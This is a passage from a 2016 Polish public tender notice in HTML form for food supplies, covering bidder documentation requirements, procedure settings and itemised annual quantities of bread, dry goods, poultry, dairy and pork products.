              </b><br /><div style="padding-left: 20px">a)Oświadczenie o braku podstaw do wykluczenia z postępowania  z przyczyn określonych w art. 24 ust. 1 pkt 12-23 i ust. 5 pkt. 1 i 8 ustawy PZP3)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu                     do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy PZP. 
c)4)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, że w zakładzie wykonawcy został wdrożony lub jest wdrażany system analizy zagrożeń HACCP - zgodnie z ustawą                z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. Nr 171 poz.1225 ze zm.)
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu, o którym mowa wyżej w podpunkcie 3) składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument ten winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego dokumentu, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio do miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
Wykonawca który składa ofertę na więcej niż jedną część zamówienia może złożyć jeden komplet dokumentów podmiotowych.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />W celu potwierdzenia spełniania warunków w postępowaniu Wykonawcy zobowiązani
są dostarczyć następujące dokumenty i oświadczenia:
1)	oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 PZP (wg wzoru stanowiącego załącznik nr 1A do formularza ofertowego);
2)	Oświadczenie o braku podstaw do wykluczenia z postępowania  z przyczyn określonych w art. 24 ust. 1 pkt 12-23 i ust. 5 pkt. 1 i 8 ustawy PZP (wg wzoru stanowiącego załącznik nr 1B do formularza ofertowego);
3)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu                     do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy PZP.
4)	zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, że w zakładzie wykonawcy został wdrożony lub jest wdrażany system analizy zagrożeń HACCP - zgodnie z ustawą                z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. Nr 171 poz.1225 ze zm.)
5)	oświadczenie o przynależności do grupy kapitałowej.
Wszystkie  wymagane dokumenty muszą być składane w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu, o którym mowa wyżej w podpunkcie 3) składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument ten winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego dokumentu, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio do miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.

Dokumenty dotyczące przynależności do tej samej grupy kapitałowej  lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r.           o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej.

Wykonawca który składa ofertę na więcej niż jedną część zamówienia może złożyć jeden komplet dokumentów podmiotowych.

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Oferta musi  spełniać następujące wymogi:
1) Oferta wraz z załącznikami powinna być sporządzona w formie pisemnej w języku polskim, czytelnie, techniką trwałą oraz podpisana przez osobę upoważnioną do zaciągania zobowiązań. Upoważnienie do podpisania oferty powinno być dołączone do oferty, o ile nie wynika to z innych dokumentów załączonych przez Wykonawcę.
2) Oferta winna być sporządzona na formularzu oferty stanowiącym załącznik nr 1 do SIWZ, bez modyfikacji jego formy przez Wykonawcę. Dotyczy to również załączników do oferty, których formularze wykonał Zamawiający.
Niesporządzenie oferty na formularzach wykonanych przez Zamawiającego nie skutkuje odrzuceniem oferty pod warunkiem, że spełnia ona wszystkie wymogi określone w SIWZ.
3) Do oferty powinny być załączone wszystkie dokumenty wymagane odpowiednimi postanowieniami SIWZ jako oryginały bądź kopie poświadczone za zgodność z oryginałem przez osobę do tego upoważnioną.
4) Wykonawca może złożyć tylko jedną ofertę. 
5) Wszystkie miejsca, w których wykonawca naniósł poprawki lub zmiany, powinny być podpisane przez osobę podpisującą ofertę.
6) Ofertę należy umieścić w nieprzezroczystych, zaklejonych dwóch kopertach.
Kopertę zewnętrzną należy zaopatrzyć w następującą informację:
Oferta  Dostawa art. żywnościowych nie otwierać przed 24.11.2016 r. przed godz. 1015.
Koperta wewnętrzna, w której należy umieścić ofertę poza opisem podanym powyżej powinna zawierać nazwę i adres Wykonawcy, aby można było ją odesłać w przypadku stwierdzenia opóźnienia w jej złożeniu.
7) Skutki związane z nie oznaczeniem koperty w sposób podany w SIWZ ponosi Wykonawca.
8) Nie oznaczenie oferty w sposób podany w SIWZ nie skutkuje odrzuceniem oferty.
9) Oferta jest jawna od chwili jej otwarcia, z wyjątkiem informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, 
a Wykonawca zastrzegł w odniesieniu do tych informacji, że nie mogą być one udostępnione innym uczestnikom postępowania	
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/11/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Pieczywo<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Grupa I    Pieczywo
Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Chleb żytni krojony                                       1 kg	szt.	7 000
2.		Chleb razowy krojony                                   1 kg	szt.	5 000
3.		Bułka wrocławska                                       100 g	szt.	25 000
4.		Bułka razowa                                               100 g	szt.	4 000
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 02/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Przetwory sypkie, przyprawy, produkty strączkowe,  przetwory, napoje<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Ananas plastry                                                     565 g	szt.	100
2.		Aromaty do ciast                                                   10 g	szt.	100
3.		Barszcz czerwony (koncentrat)                      320 ml	szt. 	60
4.		Bazylia                                                                     10 g	szt.	45
5.		Brzoskwinie w syropie                                        820 g	szt.	55
6.		Budyń różne smaki Winiary                           60-64 g	szt.	1 000
7.		Bułka tarta                                                             1  kg	kg	130
8.		Chrzan tarty                                                         290 g	szt.	350
9.		Ciastka biszkopty Wrocławskie Mamut          120 g	szt.	50
10.		Cukier kryształ                                                        1 kg	kg	2 400
11.		Cukier waniliowy                                                   32 g	szt.	250
12.		Cynamon                                                                 20 g	szt.	50
13.		Drożdże świeże                                                    100 g	szt.	130
14.		Dżem owocowy (różne smaki) Pińczów          280 g	szt.	600
15.		Dżem bezcukrowy (różne smaki)  Stovit         220 g	szt.	100
16.		Fasola czerwona konserwowa                          400 g	szt.	110
17.		Fasola Jaś                                                                1 kg	kg	150
18.		Filety śledziowe w oleju                                     170 g	szt.	350
19.		Filety śledziowe w pomidorach                        170 g	szt.	400
20.		Galaretka owocowa   Delecta                             75 g	szt.	600
21.		Gałka muszkatołowa                                             15 g	szt.	25
22.		Groch łuskany                                                         1 kg	kg	160
23.		Groszek konserwowy                                         400 g	szt.	450
24.		Herbata                                                                   1 kg	kg	85
25.		Herbata owocowa Saga (op. 25 torebek)	op.	50
26.		Imbir mielony                                                         20 g	szt.	25
27.		Kakao                                                                     200 g	szt.	50
28.		Kasza gryczana                                                       1 kg	kg	80
29.		Kasza jęczmienna                                                  1 kg	kg	280
30.		Kasza kukurydziana                                               1 kg	kg	70
31.		Kasza manna                                                          1 kg	kg	90
32.		Kaszka mleczno -ryżowa truskawkowa Nestle                     230g 	szt.	10
33.		Kawa zbożowa                                                     500 g	szt.	60
34.		Ketchup łagodny                                                 500 g	szt.	250
35.		Kisiel różne smaki Winiary                                  77 g	szt.	1 300
36.		Kminek                                                                    20 g	szt.	70
37.		Koncentrat pomidorowy 30%   Pińczów         950 g	szt.	180
38.		Konserwa mięsna  
Przysmak Śniadaniowy                                       300 g	szt.	700
39.		Koperek suszony                                                    10 g	szt.	100
40.		Kostki rosołowe drobiowe  Winiary                   60 g	szt.	150
41.		Kostki rosołowe wołowe Winiary                       60 g	szt.	200
42.		Krem do smarowania pieczywa o smaku czekoladowym                                                     200 g	szt.	100
43.		Krem do smarowania pieczywa o smaku orzechowym                                                        200 g	szt.	70
44.		Kukurydza konserwowa                                     400 g	szt.	160
45.		Kwasek cytrynowy                                                 20 g	szt.	100
46.		Liść laurowy                                                              7 g	szt.	150
47.		Majeranek                                                                 8 g	szt.	150
48.		Majonez Kielecki                                                 500 g	szt.	400
49.		Makaron nitki Lubella                                           2 kg	kg	400
50.		Makaron łazanki                                                    2 kg	kg	130
51.		Makaron muszelki                                                 2 kg	kg	170
52.		Makaron spaghetti Lubella                                  1 kg	kg	80
53.		Makaron świderki                                                  2 kg	kg	500
54.		Margaryna śniadaniowa Bielmar                     500 g	kg	600
55.		Margaryna zwykła                                               250 g	kg	125
56.		Marmolada Duchnice                                         850 g	szt.	130
57.		Marynata klasyczna Prymat                                20 g	szt.	120
58.		Marynata staropolska  Kamis                              20 g	szt.	100
59.		Masło roślinne  kubek Kruszwica                     250 g	kg	380
60.		Mąka pszenna typ 500                                         1 kg	kg	650
61.		Mąka ziemniaczana                                               1 kg	kg	20
62.		Mąka żytnia typ 500                                              1 kg	kg	130
63.		Miód pszczeli  wielokwiatowy                          370 g	szt.	120
64.		Mlekołaki kulki, kółka kakaowe                       250 g	szt.	20
65.		Morele suszone                                                   150 g	szt.	10
66.		Musztarda   stołowa                                           190 g	szt.	400
67.		Ocet                                                                         0,5 l	szt.	20
68.		Ogórki konserwowe                                            850 g	szt.	270
69.		Olej uniwersalny                                                       3 l                                 	l	400
70.		Oregano                                                                  10 g	Szt.	50
71.		Papryka konserwowa                                         780 g	szt.	60
72.		Papryka ostra                                                         20 g	szt.	100
73.		Papryka słodka                                                       20 g	szt.	150
74.		Pasztet drobiowy  Podlaski                                155 g                                              	szt.	1 100
75.		Pasztet Mazowiecki                                            460 g	szt.	370
76.		Pieczarki marynowane                                       770 g	szt.	100
77.		Pieprz naturalny mielony                                     20 g	szt.	600
78.		Pieprz ziołowy                                                        20 g	szt.	550
79.		Pietruszka suszona                                                10 g                                   	szt.	110
80.		Płatki jęczmienne                                                  1 kg	kg	50
81.		Płatki kukurydziane                                               1 kg	kg	30
82.		Płatki owsiane                                                        1 kg	kg	50
83.		Pomidory obierane                                             400 g	szt.	400
84.		Powidła węgierkowe                                          280 g	szt.	250
85.		Proszek do pieczenia                                            30 g	szt.	60
86.		Przyprawa do drobiu Cykoria                              40 g	szt.	135
87.		Przyprawa do ryb Cykoria                                    40 g	szt.	70
88.		Przyprawa do ziemniaków  Cykoria                   30 g	szt.	70
89.		Przyprawa  Warzywko                                          1 kg	kg	60
90.		Przyprawa w płynie  Maggi                                     1 l	l	120
91.		Rodzynki                                                               100 g	szt.	120
92.		Ryż długoziarnisty biały                                       1 kg	kg	450
93.		Sałatka rybna                                                        150g	szt.	1 000
94.		Sok pomidorowy  Hortex                                       1 l	szt.	30
95.		Słodzik                                                     op. 1000 szt.	op.	5
96.		Sól jodowana                                                          1 kg	kg	500
97.		Suchary delikatesowe Mamut                          285 g 	szt.	10
98.		Syrop owocowy Łowicz różne smaki              440ml	szt.	320
99.		Szczaw konserwowy                                           285 g	szt.	80
100.		Szprot w oleju                                                      170 g	szt.	450
101.		Szprot w pomidorach                                         170 g	szt.	280
102.		Szynka konserwowa mielona  Werbliński       110 g	szt.	1 250
103.		Śliwki suszone bez pestki                                   150 g	szt.	50
104.		Tuńczyk w oleju                                                   170 g	szt.	750
105.		Wiórki kokosowe                                                 100 g	szt.	50
106.		Woda mineralna gazowana                                 1,5 l	szt.	900
107.		Woda mineralna niegazowana                           1,5 l	szt.	120
108.		Zacierki                                                                    1 kg	kg	150
109.		Ziele angielskie                                                       15 g	szt.	150
110.		Zioła prowansalskie                                              10 g	szt.	50
111.		Zupa grzybowa Winiary                                        48 g	szt.	400
112.		Zupa pieczarkowa Winiary                                   45 g	szt.	450
113.		Zupa ogonowa Winiary                                        41 g	szt.	220
114.		Żelatyna spożywcza                                              40 g 	szt.	60
115.		Soda oczyszczona                                                100 g	szt.	5
116.		Mak	kg	10
117.		Susz wigilijny 	kg	5
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 02/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>Drób i przetwory drobiowe<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Kurczak schłodzony	kg	550
2.		Korpusy z kurczaka	kg	550
3.		Filet z kurczaka	kg	550
4.		Ćwiartki  z kurczaka	kg	800
5.		Wątróbka drobiowa	kg	180
6.		Żołądki z kurczaka	kg	210
7.		Mięso drobiowe gulaszowe II	kg	400
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 02/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>IV 
                  
                <b>Nazwa: </b>Nabiał i przetwory nabiałowe<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Mleko w proszku odtłuszczone	kg	700
2.		Twaróg  półtłusty 	kg	550
3.		Masło extra   82% tłuszczu                       200 g                           	kg	220
4.		Ser żółty  Gouda	kg	250
5.		Jogurt owocowy                                         150 g	szt.	5 300
6.		Jogurt naturalny                                         450 g	szt.	1 500
7.		Serek topiony   krem. op.                          100 g	szt.	2 100
8.		Serki homogenizowane waniliowe          100 g	szt.	950
9.		Kefir  kubek                                                  450 g	szt.	2 100
10.		Śmietana  24 %  kubek                            400 ml	szt.	1 000
11.		Śmietana 12%  karton       poj.               500 ml	szt.	350
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 02/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cna</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>V
                  
                <b>Nazwa: </b>Mięso wieprzowe , wędliny  i wyroby podrobowe<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Żeberka wieprzowe	kg	320
2.		Boczek surowy wieprzowy bez skóry 	kg	100
3.		Schab  wieprzowy bez kości 	kg	280
4.		Szynka wieprzowa bez kości i bez skóry	kg	310
5.		Łopatka wieprzowa bez kości i bez skóry	kg	400
6.		Słonina wieprzowa bez skóry	kg	150
7.		Podroby wieprzowe bez wątroby	kg	150
8.		Podgardle wieprzowe	kg	20
9.		Głowizna wieprzowa	kg	170
10.		Mięso wieprzowe II 	kg	400
11.		Karczek wieprzowy bez kości	kg	180
12.		Kiełbasa szynkowa wieprzowa	kg	150
13.		Kiełbasa  mielonka tyrolska	kg	310
14.		Mortadela bez dodatków	kg	310
15.		Kiełbasa cienka zwyczajna wędzona	kg	800
16.		Parówki  wieprzowe	kg	300
17.		Parówki drobiowe	kg	250
